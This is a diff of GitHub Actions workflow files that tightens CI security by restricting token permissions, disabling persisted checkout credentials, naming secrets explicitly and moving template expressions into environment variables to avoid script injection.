|
|||||||
- name: Determine deploy parameters
|
- name: Determine deploy parameters
|
||||||
id: parameters
|
id: parameters
|
||||||
uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7
|
uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7
|
||||||
|
env:
|
||||||
|
HEAD_SHA: ${{ github.event.workflow_run.head_sha }}
|
||||||
with:
|
with:
|
||||||
script: |
|
script: |
|
||||||
const eventType = context.payload.workflow_run.event;
|
const eventType = context.payload.workflow_run.event;
|
||||||
@ -57,7 +62,8 @@ jobs:
|
|||||||
} else if (eventType == "pull_request") {
|
} else if (eventType == "pull_request") {
|
||||||
let pull_number = context.payload.workflow_run.pull_requests[0]?.number;
|
let pull_number = context.payload.workflow_run.pull_requests[0]?.number;
|
||||||
if(!pull_number) {
|
if(!pull_number) {
|
||||||
const response = await github.rest.search.issuesAndPullRequests({q: 'repo:${{ github.repository }} is:pr sha:${{ github.event.workflow_run.head_sha }}',per_page: 1,})
|
const {HEAD_SHA} = process.env;
|
||||||
|
const response = await github.rest.search.issuesAndPullRequests({q: `repo:${{ github.repository }} is:pr sha:${HEAD_SHA}`,per_page: 1,})
|
||||||
const items = response.data.items
|
const items = response.data.items
|
||||||
if (items.length < 1) {
|
if (items.length < 1) {
|
||||||
throw new Error("No pull request found for the commit")
|
throw new Error("No pull request found for the commit")
|
||||||
@ -95,10 +101,16 @@ jobs:
|
|||||||
name: Docs Deploy
|
name: Docs Deploy
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
needs: checks
|
needs: checks
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
|
actions: read
|
||||||
|
pull-requests: write
|
||||||
if: ${{ fromJson(needs.checks.outputs.artifact).found && fromJson(needs.checks.outputs.parameters).shouldDeploy }}
|
if: ${{ fromJson(needs.checks.outputs.artifact).found && fromJson(needs.checks.outputs.parameters).shouldDeploy }}
|
||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
- name: Load parameters
|
- name: Load parameters
|
||||||
id: parameters
|
id: parameters
|
||||||
@ -162,9 +174,11 @@ jobs:
|
|||||||
|
|
||||||
- name: Output Cleaning
|
- name: Output Cleaning
|
||||||
id: clean
|
id: clean
|
||||||
|
env:
|
||||||
|
TG_OUTPUT: ${{ steps.docs-output.outputs.tg_action_output }}
|
||||||
run: |
|
run: |
|
||||||
TG_OUT=$(echo '${{ steps.docs-output.outputs.tg_action_output }}' | sed 's|%0A|\n|g ; s|%3C|<|g' | jq -c .)
|
CLEANED=$(echo "$TG_OUTPUT" | sed 's|%0A|\n|g ; s|%3C|<|g' | jq -c .)
|
||||||
echo "output=$TG_OUT" >> $GITHUB_OUTPUT
|
echo "output=$CLEANED" >> $GITHUB_OUTPUT
|
||||||
|
|
||||||
- name: Publish to Cloudflare Pages
|
- name: Publish to Cloudflare Pages
|
||||||
uses: cloudflare/pages-action@f0a1cd58cd66095dee69bfa18fa5efd1dde93bca # v1
|
uses: cloudflare/pages-action@f0a1cd58cd66095dee69bfa18fa5efd1dde93bca # v1
|
||||||
|
7
.github/workflows/docs-destroy.yml
vendored
7
.github/workflows/docs-destroy.yml
vendored
@ -3,13 +3,20 @@ on:
|
|||||||
pull_request_target:
|
pull_request_target:
|
||||||
types: [closed]
|
types: [closed]
|
||||||
|
|
||||||
|
permissions: {}
|
||||||
|
|
||||||
jobs:
|
jobs:
|
||||||
deploy:
|
deploy:
|
||||||
name: Docs Destroy
|
name: Docs Destroy
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
|
pull-requests: write
|
||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
- name: Destroy Docs Subdomain
|
- name: Destroy Docs Subdomain
|
||||||
env:
|
env:
|
||||||
|
4
.github/workflows/fix-format.yml
vendored
4
.github/workflows/fix-format.yml
vendored
@ -4,11 +4,14 @@ on:
|
|||||||
pull_request:
|
pull_request:
|
||||||
types: [labeled]
|
types: [labeled]
|
||||||
|
|
||||||
|
permissions: {}
|
||||||
|
|
||||||
jobs:
|
jobs:
|
||||||
fix-formatting:
|
fix-formatting:
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
if: ${{ github.event.label.name == 'fix:formatting' }}
|
if: ${{ github.event.label.name == 'fix:formatting' }}
|
||||||
permissions:
|
permissions:
|
||||||
|
contents: write
|
||||||
pull-requests: write
|
pull-requests: write
|
||||||
steps:
|
steps:
|
||||||
- name: Generate a token
|
- name: Generate a token
|
||||||
@ -23,6 +26,7 @@ jobs:
|
|||||||
with:
|
with:
|
||||||
ref: ${{ github.event.pull_request.head.ref }}
|
ref: ${{ github.event.pull_request.head.ref }}
|
||||||
token: ${{ steps.generate-token.outputs.token }}
|
token: ${{ steps.generate-token.outputs.token }}
|
||||||
|
persist-credentials: true
|
||||||
|
|
||||||
- name: Setup Node
|
- name: Setup Node
|
||||||
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
||||||
|
2
.github/workflows/pr-label-validation.yml
vendored
2
.github/workflows/pr-label-validation.yml
vendored
@ -4,6 +4,8 @@ on:
|
|||||||
pull_request_target:
|
pull_request_target:
|
||||||
types: [opened, labeled, unlabeled, synchronize]
|
types: [opened, labeled, unlabeled, synchronize]
|
||||||
|
|
||||||
|
permissions: {}
|
||||||
|
|
||||||
jobs:
|
jobs:
|
||||||
validate-release-label:
|
validate-release-label:
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
2
.github/workflows/pr-labeler.yml
vendored
2
.github/workflows/pr-labeler.yml
vendored
@ -2,6 +2,8 @@ name: 'Pull Request Labeler'
|
|||||||
on:
|
on:
|
||||||
- pull_request_target
|
- pull_request_target
|
||||||
|
|
||||||
|
permissions: {}
|
||||||
|
|
||||||
jobs:
|
jobs:
|
||||||
labeler:
|
labeler:
|
||||||
permissions:
|
permissions:
|
||||||
|
@ -4,9 +4,13 @@ on:
|
|||||||
pull_request:
|
pull_request:
|
||||||
types: [opened, synchronize, reopened, edited]
|
types: [opened, synchronize, reopened, edited]
|
||||||
|
|
||||||
|
permissions: {}
|
||||||
|
|
||||||
jobs:
|
jobs:
|
||||||
validate-pr-title:
|
validate-pr-title:
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
pull-requests: write
|
||||||
steps:
|
steps:
|
||||||
- name: PR Conventional Commit Validation
|
- name: PR Conventional Commit Validation
|
||||||
uses: ytanikin/PRConventionalCommits@b628c5a234cc32513014b7bfdd1e47b532124d98 # 1.3.0
|
uses: ytanikin/PRConventionalCommits@b628c5a234cc32513014b7bfdd1e47b532124d98 # 1.3.0
|
||||||
|
18
.github/workflows/prepare-release.yml
vendored
18
.github/workflows/prepare-release.yml
vendored
@ -21,13 +21,14 @@ concurrency:
|
|||||||
group: ${{ github.workflow }}-${{ github.ref }}-root
|
group: ${{ github.workflow }}-${{ github.ref }}-root
|
||||||
cancel-in-progress: true
|
cancel-in-progress: true
|
||||||
|
|
||||||
|
permissions: {}
|
||||||
|
|
||||||
jobs:
|
jobs:
|
||||||
bump_version:
|
bump_version:
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
|
||||||
outputs:
|
outputs:
|
||||||
ref: ${{ steps.push-tag.outputs.commit_long_sha }}
|
ref: ${{ steps.push-tag.outputs.commit_long_sha }}
|
||||||
|
permissions: {} # No job-level permissions are needed because it uses the app-token
|
||||||
steps:
|
steps:
|
||||||
- name: Generate a token
|
- name: Generate a token
|
||||||
id: generate-token
|
id: generate-token
|
||||||
@ -40,6 +41,7 @@ jobs:
|
|||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
with:
|
with:
|
||||||
token: ${{ steps.generate-token.outputs.token }}
|
token: ${{ steps.generate-token.outputs.token }}
|
||||||
|
persist-credentials: true
|
||||||
|
|
||||||
- name: Install uv
|
- name: Install uv
|
||||||
uses: astral-sh/setup-uv@0c5e2b8115b80b4c7c5ddf6ffdd634974642d182 # v5
|
uses: astral-sh/setup-uv@0c5e2b8115b80b4c7c5ddf6ffdd634974642d182 # v5
|
||||||
@ -59,14 +61,20 @@ jobs:
|
|||||||
build_mobile:
|
build_mobile:
|
||||||
uses: ./.github/workflows/build-mobile.yml
|
uses: ./.github/workflows/build-mobile.yml
|
||||||
needs: bump_version
|
needs: bump_version
|
||||||
secrets: inherit
|
secrets:
|
||||||
|
KEY_JKS: ${{ secrets.KEY_JKS }}
|
||||||
|
ALIAS: ${{ secrets.ALIAS }}
|
||||||
|
ANDROID_KEY_PASSWORD: ${{ secrets.ANDROID_KEY_PASSWORD }}
|
||||||
|
ANDROID_STORE_PASSWORD: ${{ secrets.ANDROID_STORE_PASSWORD }}
|
||||||
with:
|
with:
|
||||||
ref: ${{ needs.bump_version.outputs.ref }}
|
ref: ${{ needs.bump_version.outputs.ref }}
|
||||||
|
|
||||||
prepare_release:
|
prepare_release:
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
needs: build_mobile
|
needs: build_mobile
|
||||||
|
permissions:
|
||||||
|
actions: read # To download the app artifact
|
||||||
|
# No content permissions are needed because it uses the app-token
|
||||||
steps:
|
steps:
|
||||||
- name: Generate a token
|
- name: Generate a token
|
||||||
id: generate-token
|
id: generate-token
|
||||||
@ -79,6 +87,7 @@ jobs:
|
|||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
with:
|
with:
|
||||||
token: ${{ steps.generate-token.outputs.token }}
|
token: ${{ steps.generate-token.outputs.token }}
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
- name: Download APK
|
- name: Download APK
|
||||||
uses: actions/download-artifact@95815c38cf2ff2164869cbab79da8d1f422bc89e # v4
|
uses: actions/download-artifact@95815c38cf2ff2164869cbab79da8d1f422bc89e # v4
|
||||||
@ -90,6 +99,7 @@ jobs:
|
|||||||
with:
|
with:
|
||||||
draft: true
|
draft: true
|
||||||
tag_name: ${{ env.IMMICH_VERSION }}
|
tag_name: ${{ env.IMMICH_VERSION }}
|
||||||
|
token: ${{ steps.generate-token.outputs.token }}
|
||||||
generate_release_notes: true
|
generate_release_notes: true
|
||||||
body_path: misc/release/notes.tmpl
|
body_path: misc/release/notes.tmpl
|
||||||
files: |
|
files: |
|
||||||
|
2
.github/workflows/preview-label.yaml
vendored
2
.github/workflows/preview-label.yaml
vendored
@ -4,6 +4,8 @@ on:
|
|||||||
pull_request:
|
pull_request:
|
||||||
types: [labeled, closed]
|
types: [labeled, closed]
|
||||||
|
|
||||||
|
permissions: {}
|
||||||
|
|
||||||
jobs:
|
jobs:
|
||||||
comment-status:
|
comment-status:
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
8
.github/workflows/sdk.yml
vendored
8
.github/workflows/sdk.yml
vendored
@ -4,18 +4,22 @@ on:
|
|||||||
release:
|
release:
|
||||||
types: [published]
|
types: [published]
|
||||||
|
|
||||||
permissions:
|
permissions: {}
|
||||||
packages: write
|
|
||||||
|
|
||||||
jobs:
|
jobs:
|
||||||
publish:
|
publish:
|
||||||
name: Publish `@immich/sdk`
|
name: Publish `@immich/sdk`
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
defaults:
|
defaults:
|
||||||
run:
|
run:
|
||||||
working-directory: ./open-api/typescript-sdk
|
working-directory: ./open-api/typescript-sdk
|
||||||
steps:
|
steps:
|
||||||
- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
# Setup .npmrc file to publish to npm
|
# Setup .npmrc file to publish to npm
|
||||||
- uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
- uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
||||||
with:
|
with:
|
||||||
|
16
.github/workflows/static_analysis.yml
vendored
16
.github/workflows/static_analysis.yml
vendored
@ -9,14 +9,20 @@ concurrency:
|
|||||||
group: ${{ github.workflow }}-${{ github.ref }}
|
group: ${{ github.workflow }}-${{ github.ref }}
|
||||||
cancel-in-progress: true
|
cancel-in-progress: true
|
||||||
|
|
||||||
|
permissions: {}
|
||||||
|
|
||||||
jobs:
|
jobs:
|
||||||
pre-job:
|
pre-job:
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
outputs:
|
outputs:
|
||||||
should_run: ${{ steps.found_paths.outputs.mobile == 'true' || steps.should_force.outputs.should_force == 'true' }}
|
should_run: ${{ steps.found_paths.outputs.mobile == 'true' || steps.should_force.outputs.should_force == 'true' }}
|
||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
- id: found_paths
|
- id: found_paths
|
||||||
uses: dorny/paths-filter@de90cc6fb38fc0963ad72b210f1f284cd68cea36 # v3
|
uses: dorny/paths-filter@de90cc6fb38fc0963ad72b210f1f284cd68cea36 # v3
|
||||||
with:
|
with:
|
||||||
@ -33,12 +39,14 @@ jobs:
|
|||||||
name: Run Dart Code Analysis
|
name: Run Dart Code Analysis
|
||||||
needs: pre-job
|
needs: pre-job
|
||||||
if: ${{ needs.pre-job.outputs.should_run == 'true' }}
|
if: ${{ needs.pre-job.outputs.should_run == 'true' }}
|
||||||
|
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
- name: Setup Flutter SDK
|
- name: Setup Flutter SDK
|
||||||
uses: subosito/flutter-action@e938fdf56512cc96ef2f93601a5a40bde3801046 # v2
|
uses: subosito/flutter-action@e938fdf56512cc96ef2f93601a5a40bde3801046 # v2
|
||||||
@ -69,9 +77,11 @@ jobs:
|
|||||||
|
|
||||||
- name: Verify files have not changed
|
- name: Verify files have not changed
|
||||||
if: steps.verify-changed-files.outputs.files_changed == 'true'
|
if: steps.verify-changed-files.outputs.files_changed == 'true'
|
||||||
|
env:
|
||||||
|
CHANGED_FILES: ${{ steps.verify-changed-files.outputs.changed_files }}
|
||||||
run: |
|
run: |
|
||||||
echo "ERROR: Generated files not up to date! Run make_build inside the mobile directory"
|
echo "ERROR: Generated files not up to date! Run make_build inside the mobile directory"
|
||||||
echo "Changed files: ${{ steps.verify-changed-files.outputs.changed_files }}"
|
echo "Changed files: ${CHANGED_FILES}"
|
||||||
exit 1
|
exit 1
|
||||||
|
|
||||||
- name: Run dart analyze
|
- name: Run dart analyze
|
||||||
|
80
.github/workflows/test.yml
vendored
80
.github/workflows/test.yml
vendored
@ -9,9 +9,13 @@ concurrency:
|
|||||||
group: ${{ github.workflow }}-${{ github.ref }}
|
group: ${{ github.workflow }}-${{ github.ref }}
|
||||||
cancel-in-progress: true
|
cancel-in-progress: true
|
||||||
|
|
||||||
|
permissions: {}
|
||||||
|
|
||||||
jobs:
|
jobs:
|
||||||
pre-job:
|
pre-job:
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
outputs:
|
outputs:
|
||||||
should_run_web: ${{ steps.found_paths.outputs.web == 'true' || steps.should_force.outputs.should_force == 'true' }}
|
should_run_web: ${{ steps.found_paths.outputs.web == 'true' || steps.should_force.outputs.should_force == 'true' }}
|
||||||
should_run_server: ${{ steps.found_paths.outputs.server == 'true' || steps.should_force.outputs.should_force == 'true' }}
|
should_run_server: ${{ steps.found_paths.outputs.server == 'true' || steps.should_force.outputs.should_force == 'true' }}
|
||||||
@ -25,6 +29,9 @@ jobs:
|
|||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
- id: found_paths
|
- id: found_paths
|
||||||
uses: dorny/paths-filter@de90cc6fb38fc0963ad72b210f1f284cd68cea36 # v3
|
uses: dorny/paths-filter@de90cc6fb38fc0963ad72b210f1f284cd68cea36 # v3
|
||||||
with:
|
with:
|
||||||
@ -58,6 +65,8 @@ jobs:
|
|||||||
needs: pre-job
|
needs: pre-job
|
||||||
if: ${{ needs.pre-job.outputs.should_run_server == 'true' }}
|
if: ${{ needs.pre-job.outputs.should_run_server == 'true' }}
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
defaults:
|
defaults:
|
||||||
run:
|
run:
|
||||||
working-directory: ./server
|
working-directory: ./server
|
||||||
@ -65,6 +74,8 @@ jobs:
|
|||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
- name: Setup Node
|
- name: Setup Node
|
||||||
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
||||||
@ -95,6 +106,8 @@ jobs:
|
|||||||
needs: pre-job
|
needs: pre-job
|
||||||
if: ${{ needs.pre-job.outputs.should_run_cli == 'true' }}
|
if: ${{ needs.pre-job.outputs.should_run_cli == 'true' }}
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
defaults:
|
defaults:
|
||||||
run:
|
run:
|
||||||
working-directory: ./cli
|
working-directory: ./cli
|
||||||
@ -102,6 +115,8 @@ jobs:
|
|||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
- name: Setup Node
|
- name: Setup Node
|
||||||
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
||||||
@ -136,6 +151,8 @@ jobs:
|
|||||||
needs: pre-job
|
needs: pre-job
|
||||||
if: ${{ needs.pre-job.outputs.should_run_cli == 'true' }}
|
if: ${{ needs.pre-job.outputs.should_run_cli == 'true' }}
|
||||||
runs-on: windows-latest
|
runs-on: windows-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
defaults:
|
defaults:
|
||||||
run:
|
run:
|
||||||
working-directory: ./cli
|
working-directory: ./cli
|
||||||
@ -143,6 +160,8 @@ jobs:
|
|||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
- name: Setup Node
|
- name: Setup Node
|
||||||
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
||||||
@ -170,6 +189,8 @@ jobs:
|
|||||||
needs: pre-job
|
needs: pre-job
|
||||||
if: ${{ needs.pre-job.outputs.should_run_web == 'true' }}
|
if: ${{ needs.pre-job.outputs.should_run_web == 'true' }}
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
defaults:
|
defaults:
|
||||||
run:
|
run:
|
||||||
working-directory: ./web
|
working-directory: ./web
|
||||||
@ -177,6 +198,8 @@ jobs:
|
|||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
- name: Setup Node
|
- name: Setup Node
|
||||||
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
||||||
@ -215,6 +238,8 @@ jobs:
|
|||||||
needs: pre-job
|
needs: pre-job
|
||||||
if: ${{ needs.pre-job.outputs.should_run_e2e == 'true' }}
|
if: ${{ needs.pre-job.outputs.should_run_e2e == 'true' }}
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
defaults:
|
defaults:
|
||||||
run:
|
run:
|
||||||
working-directory: ./e2e
|
working-directory: ./e2e
|
||||||
@ -222,6 +247,8 @@ jobs:
|
|||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
- name: Setup Node
|
- name: Setup Node
|
||||||
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
||||||
@ -254,6 +281,8 @@ jobs:
|
|||||||
needs: pre-job
|
needs: pre-job
|
||||||
if: ${{ needs.pre-job.outputs.should_run_server == 'true' }}
|
if: ${{ needs.pre-job.outputs.should_run_server == 'true' }}
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
defaults:
|
defaults:
|
||||||
run:
|
run:
|
||||||
working-directory: ./server
|
working-directory: ./server
|
||||||
@ -261,6 +290,8 @@ jobs:
|
|||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
- name: Setup Node
|
- name: Setup Node
|
||||||
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
||||||
@ -279,6 +310,8 @@ jobs:
|
|||||||
needs: pre-job
|
needs: pre-job
|
||||||
if: ${{ needs.pre-job.outputs.should_run_e2e_server_cli == 'true' }}
|
if: ${{ needs.pre-job.outputs.should_run_e2e_server_cli == 'true' }}
|
||||||
runs-on: mich
|
runs-on: mich
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
defaults:
|
defaults:
|
||||||
run:
|
run:
|
||||||
working-directory: ./e2e
|
working-directory: ./e2e
|
||||||
@ -287,6 +320,7 @@ jobs:
|
|||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
with:
|
with:
|
||||||
|
persist-credentials: false
|
||||||
submodules: 'recursive'
|
submodules: 'recursive'
|
||||||
|
|
||||||
- name: Setup Node
|
- name: Setup Node
|
||||||
@ -321,6 +355,8 @@ jobs:
|
|||||||
needs: pre-job
|
needs: pre-job
|
||||||
if: ${{ needs.pre-job.outputs.should_run_e2e_web == 'true' }}
|
if: ${{ needs.pre-job.outputs.should_run_e2e_web == 'true' }}
|
||||||
runs-on: mich
|
runs-on: mich
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
defaults:
|
defaults:
|
||||||
run:
|
run:
|
||||||
working-directory: ./e2e
|
working-directory: ./e2e
|
||||||
@ -329,6 +365,7 @@ jobs:
|
|||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
with:
|
with:
|
||||||
|
persist-credentials: false
|
||||||
submodules: 'recursive'
|
submodules: 'recursive'
|
||||||
|
|
||||||
- name: Setup Node
|
- name: Setup Node
|
||||||
@ -362,8 +399,13 @@ jobs:
|
|||||||
needs: pre-job
|
needs: pre-job
|
||||||
if: ${{ needs.pre-job.outputs.should_run_mobile == 'true' }}
|
if: ${{ needs.pre-job.outputs.should_run_mobile == 'true' }}
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
steps:
|
steps:
|
||||||
- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
- name: Setup Flutter SDK
|
- name: Setup Flutter SDK
|
||||||
uses: subosito/flutter-action@e938fdf56512cc96ef2f93601a5a40bde3801046 # v2
|
uses: subosito/flutter-action@e938fdf56512cc96ef2f93601a5a40bde3801046 # v2
|
||||||
with:
|
with:
|
||||||
@ -378,11 +420,16 @@ jobs:
|
|||||||
needs: pre-job
|
needs: pre-job
|
||||||
if: ${{ needs.pre-job.outputs.should_run_ml == 'true' }}
|
if: ${{ needs.pre-job.outputs.should_run_ml == 'true' }}
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
defaults:
|
defaults:
|
||||||
run:
|
run:
|
||||||
working-directory: ./machine-learning
|
working-directory: ./machine-learning
|
||||||
steps:
|
steps:
|
||||||
- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
- name: Install uv
|
- name: Install uv
|
||||||
uses: astral-sh/setup-uv@0c5e2b8115b80b4c7c5ddf6ffdd634974642d182 # v5
|
uses: astral-sh/setup-uv@0c5e2b8115b80b4c7c5ddf6ffdd634974642d182 # v5
|
||||||
- uses: actions/setup-python@8d9ed9ac5c53483de85588cdf95a591a75ab9f55 # v5
|
- uses: actions/setup-python@8d9ed9ac5c53483de85588cdf95a591a75ab9f55 # v5
|
||||||
@ -411,6 +458,8 @@ jobs:
|
|||||||
needs: pre-job
|
needs: pre-job
|
||||||
if: ${{ needs.pre-job.outputs['should_run_.github'] == 'true' }}
|
if: ${{ needs.pre-job.outputs['should_run_.github'] == 'true' }}
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
defaults:
|
defaults:
|
||||||
run:
|
run:
|
||||||
working-directory: ./.github
|
working-directory: ./.github
|
||||||
@ -418,6 +467,8 @@ jobs:
|
|||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
- name: Setup Node
|
- name: Setup Node
|
||||||
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
||||||
@ -434,22 +485,31 @@ jobs:
|
|||||||
shellcheck:
|
shellcheck:
|
||||||
